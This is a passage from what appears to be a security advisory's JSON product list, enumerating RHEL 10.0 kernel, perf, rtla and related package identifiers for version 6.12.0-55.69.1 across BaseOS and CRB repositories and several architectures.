"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
